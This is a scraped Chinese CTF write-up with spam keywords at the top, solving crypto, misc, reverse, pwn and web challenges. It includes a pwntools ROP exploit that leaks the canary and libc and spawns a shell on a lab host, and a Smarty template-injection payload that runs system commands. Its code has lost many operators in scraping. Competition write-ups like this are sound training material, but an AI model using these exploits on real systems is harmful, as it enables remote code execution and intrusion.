珠海中小企业网站建设,南京网站设公司,站长查询域名,wordpress 找不到版权文章目录 Crypto比base64少的baseaffine简单的RSA Misc不要动我的flagSimpleUSB猜猜我是谁不聪明的AI Pwngetitezbbstack Reverse谁的DNA动了Dont Touch Me Weblittle_gamejustppbezbbssmart 题目附件#xff0c;文章末尾微信公众号点点关注亲#xff0c;谢谢亲~ 题目附件链接… 文章目录 Crypto比base64少的baseaffine简单的RSA Misc不要动我的flagSimpleUSB猜猜我是谁不聪明的AI Pwngetitezbbstack Reverse谁的DNA动了Dont Touch Me Weblittle_gamejustppbezbbssmart 题目附件文章末尾微信公众号点点关注亲谢谢亲~ 题目附件链接https://pan.baidu.com/s/1kC9kiyUCfjTxqkXPpUFoXw
提取码dh2w Crypto
比base64少的base affine
wohz{k533q73q-t76t-9292-351w-h880t22q2q59}a3 b7简单的RSA
p r**5 r**4 - r**3 r**2 - r 2023
q r**5 - r**4 r**3 - r**2 r 2023所以n近似等于
r**10 - r**8 2*r**7 - 3*r**6 4050*r**5 - 3*r**4 2*r**3 - r**2 4092529nz3求解出r进而得到p、q 然后进行常规的解密
n 25066797992811602609904442429968244207814135173233823574561146780193277243588729282392464721760638040595480284865294238118778099149754637586361909432730412493061503054820202744474632665791457r Real(r)
s Solver()
s.add(r**10 - r**8 2*r**7 - 3*r**6 4050*r**5 - 3*r**4 2*r**3 - r**2 4092529n)
print(s.check())
print(s.model())
[r -10962507061290870331]from Crypto.Util.number import *
# from secret import flag
from sympy import nextprimeflagbr 10962507061290870331
p r**5 r**4 - r**3 r**2 - r 2023
q r**5 - r**4 r**3 - r**2 r 2023
p nextprime(p)
q nextprime(q)
n p*q
d inverse_mod(65537,(p-1)*(q-1))c 18808483076270941157829928736000549389727451019027515249724024369421942132354537978233676261769285858813983730966871222263698559152437016666829640339912308636169767041243411900882395764607422
def enc(c, n):return ZZ(pow(c, d, n))
long_to_bytes(enc(c, n))
bflag{5afe5cbb-4b4c-9cb6-f8b6-032cabf4b7e7}Misc
不要动我的flag
追踪TCP流第0个流发现flag的sha256 第3个流发现残缺的flag
import random
import hashlibhexStr 0123456789abcdef
while True:partFlag .join([random.choice(hexStr) for _ in range(4)])flag flag{{22af230f-bbed-{}-95fa-b6b1ca6dc32e}}.format(partFlag)sha256Flag hashlib.sha256(flag.encode()).hexdigest()if sha256Flag[:20] c7e6ea42b7301e6330ba:print(flag, sha256Flag)breakPS C:\Users\Administrator\Downloads python .\misc.py
flag{22af230f-bbed-48b9-95fa-b6b1ca6dc32e} c7e6ea42b7301e6330ba3959fe407930191d371885935ad4cd51e95e857a3155SimpleUSB 原题HWS第七期夏令营硬件安全营预选赛Misc USB 过滤所有的长度为35的usb.capdata
D:\Wireshark\tshark.exe -r .\misc1.pcapng -T fields -Y frame.len35 -e usb.capdata keyboard.txt有很多20开头的这些里面也是有键盘数据的把条件一起加进去然后脚本处理
# -*- coding: utf-8 -*-
import renormalKeys {04: a, 05: b, 06: c, 07: d, 08: e, 09: f, 0a: g, 0b: h, 0c: i,0d: j, 0e: k, 0f: l, 10: m, 11: n, 12: o, 13: p, 14: q, 15: r,16: s, 17: t, 18: u, 19: v, 1a: w, 1b: x, 1c: y, 1d: z, 1e: 1,1f: 2, 20: 3, 21: 4, 22: 5, 23: 6, 24: 7, 25: 8, 26: 9, 27: 0,28: RET, 29: ESC, 2a: DEL, 2b: \t, 2c: SPACE, 2d: -, 2e: , 2f: [,30: ], 31: \\, 32: NON, 33: ;, 34: , 35: GA, 36: ,, 37: ., 38: /,39: CAP, 3a: F1, 3b: F2, 3c: F3, 3d: F4, 3e: F5, 3f: F6,40: F7, 41: F8, 42: F9, 43: F10, 44: F11, 45: F12}shiftKeys {04: A, 05: B, 06: C, 07: D, 08: E, 09: F, 0a: G, 0b: H, 0c: I,0d: J, 0e: K, 0f: L, 10: M, 11: N, 12: O, 13: P, 14: Q, 15: R,16: S, 17: T, 18: U, 19: V, 1a: W, 1b: X, 1c: Y, 1d: Z, 1e: !,1f: , 20: #, 21: $, 22: %, 23: ^, 24: , 25: *, 26: (, 27: ),28: RET, 29: ESC, 2a: DEL, 2b: \t, 2c: SPACE, 2d: _, 2e: , 2f: {,30: }, 31: |, 32: NON, 33: \, 34: :, 35: GA, 36: , 37: , 38: ?,39: CAP, 3a: F1, 3b: F2, 3c: F3, 3d: F4, 3e: F5, 3f: F6,40: F7, 41: F8, 42: F9, 43: F10, 44: F11, 45: F12}def filterProcess(output):content output.replace(SPACE, )while True:if DEL in content:content re.sub(r[^]DEL, , content)else:breakreturn contentwith open(keyboard.txt, r) as f:output lines f.readlines()for line in lines:ifShiftKeys, usbData line[0:2], line[4:6]if usbData ! 00:if ifShiftKeys 00:if usbData in normalKeys:output normalKeys[usbData]elif ifShiftKeys 02 or ifShiftKeys 20: # 按下了Shift键if usbData in shiftKeys:output shiftKeys[usbData]
print([]Output: {}\n.format(output))
print([]Filter Processed: {}.format(filterProcess(output)))PS C:\Users\Administrator\Downloads python .\UsbKeyboard.py
[]Output: Ao(mgHyDELY$\CAPaq7CAPgW2D$dE6#oO0fGm1hAI/N#4CDELAN;CAPmspCAPfrQ149K最终得到Ao(mgHY$\AQ7gW2D$dE6#oO0fGm1hAI/N#4AN;MSPfrQ149K直接跑一下看看是啥子
猜猜我是谁
根据题目提示猜测outguess的密码是扑克牌K画像的人名caesar r 然后还有一层凯撒
不聪明的AI
输入flag回答说中文直接输出旗帜返回flag
Pwn
getitez
静态分析下addbook里面的v9是栈上的,v8指向addbook的函数 addbook函数 上面v9是0x18 下面read可以读0x100个字节明显一个栈溢出先用 showbook功能leak出canary和libc地址然后ROP
__int64 __fastcall sub_14BA(__int64 a1, void *a2)
{__int64 result; // raxstd::operatorstd::char_traitschar(std::cout, book name:);read(0, a2, 0x100uLL);std::operatorstd::char_traitschar(std::cout, book price:);std::istream::operator(std::cin, a1 8);result a1;*(_QWORD *)(a1 16) a2;return result;
}exp
from pwn import *
from LibcSearcher import *
context(arch amd64, os linux, log_level info) #infopath ./getitez
#p process(path)
p remote(10.10.10.101, 35067)
elf ELF(path)
libc elf.libcdef g():gdb.attach(p)raw_input()sl lambda arg : p.sendline(arg)
sla lambda arg1, arg2 : p.sendlineafter(arg1, arg2)
sd lambda arg : p.send(arg)
ru lambda arg : p.recvuntil(arg)
rl lambda : p.recvline()
sa lambda arg1, arg2 : p.sendafter(arg1, arg2)
inv lambda : p.interactive()def choice(num):sla(bchoice, str(num).encode())def addbook(name):choice(1)sla(bname:, name)sla(bprice:, b123)def showbook():choice(2)pay ba * 0x18
addbook(pay)
showbook()ru(ba * 0x18)
canary int.from_bytes(p.recv(14), little) 0xffffffffffffff00
log.success(canary hex(canary))pay1 ba * 0x38
addbook(pay1)
showbook()libc_base u64(ru(b\x7f)[-6:].ljust(0x8, b\x00))
libc.address libc_base ((libc_base - libc.sym[__libc_start_main]) 12) 12
log.success(libc_base hex(libc_base))bin_sh next(libc.search(b/bin/sh))
system_addr libc.sym[system]
pop_rdi next(libc.search(asm(pop rdi; ret)))log.success(bin_sh hex(bin_sh))
log.success(system_addr hex(system_addr))payload ba * 0x18 p64(canary)
payload p64(pop_rdi 1) * 4 p64(pop_rdi)
payload p64(bin_sh) p64(system_addr)addbook(payload)
choice(4)inv()bbstack
还在研究中…
Reverse
谁的DNA动了
程序主函数
int __cdecl main(int argc, const char **argv, const char **envp)
{unsigned int v4; // [rspCh] [rbp-14h]int i; // [rsp10h] [rbp-10h]int s; // [rsp14h] [rbp-Ch] BYREFunsigned __int64 v7; // [rsp18h] [rbp-8h]v7 __readfsqword(0x28u);init(argc, argv, envp);s 0;v4 read(0, inputs, 0x40uLL);if ( inputs[v4 - 1] 10 )inputs[--v4] 0;for ( i 0; i (int)v4; i ){memset(s, 0, sizeof(s));encode(inputs[i], (__int64)s);outputs[4 * i 3] s;outputs[4 * i 2] BYTE1(s);outputs[4 * i 1] BYTE2(s);outputs[4 * i] HIBYTE(s);}if ( (unsigned __int8)judge(outputs, CODE, v4) ){puts(well done!you get it);}else if ( !strncmp(flag{, inputs, 5uLL) ){
//最开始看到后面那个太激动 以为直接爆破4字节的md5就行不过交上去是错的 还是得逆 puts(hey!tell you the flag?);puts(flag{Th14_15_a_xxxx_flAg},the MD5 hash value of xxxx is \7c76fb919bab9a1abfe854cf80725a09\,just 4 bytes);}return 0;
}//子函数1
__int64 __fastcall encode(unsigned int a1, __int64 a2)
{__int64 result; // raxint i; // [rsp1Ch] [rbp-4h]result a1;for ( i 0; i 3; i ) // box AGCT{result (unsigned __int8)box[((char)a1 (2 * i)) 3];*(_BYTE *)(i a2) result;}return result;
}//子函数2
bool __fastcall judge(__int64 a1, __int64 a2, int a3)
{int v4; // ebxint v5; // ebxint v6; // r12dint v8; // [rsp28h] [rbp-18h]int i; // [rsp2Ch] [rbp-14h]v8 0;if ( 4 * a3 strlen(CODE) )return 0;for ( i 0; i a3; i ){v4 Int(*(_BYTE *)(i a1));v5 Int(*(_BYTE *)(i a2)) v4;v6 Int(K);if ( v5 v6 - (unsigned int)Int(B) )v8;}return 4 * v8 strlen(CODE);
}//子函数3
__int64 __fastcall Int(char a1)
{__int64 result; // raxswitch ( a1 ){case A:result 0LL;break;case B:result 4LL;break;case C:result 2LL;break;case D:result 5LL;break;case F:result 6LL;break;case G:result 1LL;break;case K:result 7LL;break;case M:result 8LL;break;case T:result 3LL;break;default:result 10LL;break;}return result;
}一个ascii码字符是8位循环4次每次取2位然后按照box数组存储就是每4个encode后的字符就是原来的一个字符 最后对比的对象
CODE CGCGCGATCGTCCGCACAGATACATATGTACCTATTTATTTAGTCGTCTACCCGCCTACGCGCCTACGTACCCGCTCGTCTATTTATCCGTATATTTACTTAGCTATCTACTCGTATACTTACATACGCGTCCGCCTATTTAGTTACACAAC先根据CODE还原出encode后的字符串
#include header.h
#include base64.cpp
#include func.cpp
#include tea.cpp__int64 __fastcall Int(char a1)
{__int64 result; // raxswitch ( a1 ){case A:result 0LL;break;case B:result 4LL;break;case C:result 2LL;break;case D:result 5LL;break;case F:result 6LL;break;case G:result 1LL;break;case K:result 7LL;break;case M:result 8LL;break;case T:result 3LL;break;default:result 10LL;break;}return result;
}int main()
{char ans[] CGCGCGATCGTCCGCACAGATACATATGTACCTATTTATTTAGTCGTCTACCCGCCTACGCGCCTACGTACCCGCTCGTCTATTTATCCGTATATTTACTTAGCTATCTACTCGTATACTTACATACGCGTCCGCCTATTTAGTTACACAAC;char res[0x100] {0};p(i, 0, strlen(ans)) {p(j, 0x20, 0x7f) {if (Int(ans[i]) Int((char)j) 3){res[i] (char)j;}}}p(i, 0, strlen(res)) {printf(%c, res[i]);}//GCGCGCTAGCAGGCGTGTCTATGTATACATGGATAAATAAATCAGCAGATGGGCGGATGCGCGGATGCATGGGCGAGCAGATAAATAGGCATATAAATGAATCGATAGATGAGCATATGAATGTATGCGCAGGCGGATAAATCAATGTGTTGreturn 21;
}然后就是将4个字符重新组合成原来的1个字符 res GCGCGCTAGCAGGCGTGTCTATGTATACATGGATAAATAAATCAGCAGATGGGCGGATGCGCGGATGCATGGGCGAGCAGATAAATAGGCATATAAATGAATCGATAGATGAGCATATGAATGTATGCGCAGGCGGATAAATCAATGTGTTGbox AGCTfor i in range(0, len(res), 4):a1 (int(box.index(res[i])))a2 (int(box.index(res[i 1])))a3 (int(box.index(res[i 2])))a4 (int(box.index(res[i 3])))c ((a1 6) (a2 4) (a3 2) a4)print(chr(c), end)#flag{725008a5e6e65da01c04914c476ae087}Don’t Touch Me
程序给的是一个ELF文件结果用ida看一篇混乱发现有很多python的痕迹估计是python打包的ELF用工具还原 还原后 基本上就是对导入的touch.check的调用用ida看py解包出来的touch.so文件
__int64 __fastcall check(BYTE *a1)
{int i; // [rsp10h] [rbp-8h]int j; // [rsp14h] [rbp-4h]for ( i 0; i 37; i ){a1[i] ^ 0x25u;a1[i] * 2;}for ( j 0; j 37; j ){if ( a1[j] ! ans[j] )return 0LL;}return 1LL;
}
#ans [0x86, 0x92, 0x88, 0x84, 0xbc, 0xea, 0xb8, 0xf4, 0x28, 0x2c, 0xf4, 0x2c, 0xca, 0xac, 0xb8, 0xf4, 0xc2, 0x2a, 0x96, 0x24, 0xf4, 0xe2, 0x2a, 0xa0, 0x2e, 0x9a, 0xf4, 0xd0, 0x2c, 0xf4, 0xc8, 0x84, 0x88, 0x98, 0x96, 0x8, 0xb0, 0x4a]把操作还原就行 enc [0x86, 0x92, 0x88, 0x84, 0xbc, 0xea, 0xb8, 0xf4, 0x28, 0x2c, 0xf4, 0x2c, 0xca, 0xac, 0xb8, 0xf4, 0xc2, 0x2a,0x96, 0x24, 0xf4, 0xe2, 0x2a, 0xa0, 0x2e, 0x9a, 0xf4, 0xd0, 0x2c, 0xf4, 0xc8, 0x84, 0x88, 0x98, 0x96, 0x8,0xb0, 0x4a]for i in enc:c chr((i // 2) ^ 0x25)print(c, end)#flag{Py_13_3sy_D0n7_T0u2h_M3_Again!}Web
little_game
查看源码发现一个success给了一串字符以及一个数组下标直接就是遍历这串字符的下标得到的就是flag
arr 1234567890qwertyuiopasdfghjklzxcvbnm{}-
index [23,28,20,24,36,1,3,7,6,3,38,2,8,9,5,7,21,38,9,3,6,18,22,38,26,16,6,18,15,37]
print(.join([arr[i] for i in index]))
# flag{24874-39068s-047od-ju7oy}justppb
试过爆破但是习惯用的是自己的字典没想到这里要用Burp自带的字典和密码爆破。。。。。
ezbbs
还在研究中…
smart
Smarty的模板注入https://xz.aliyun.com/t/11108#toc-6 就是换了个名字把template_object改成template即可
datastring:{$smarty.template-smarty-enableSecurity()-display(string:{system(ls -lha /)})}绕过直接?匹配或者通配符*
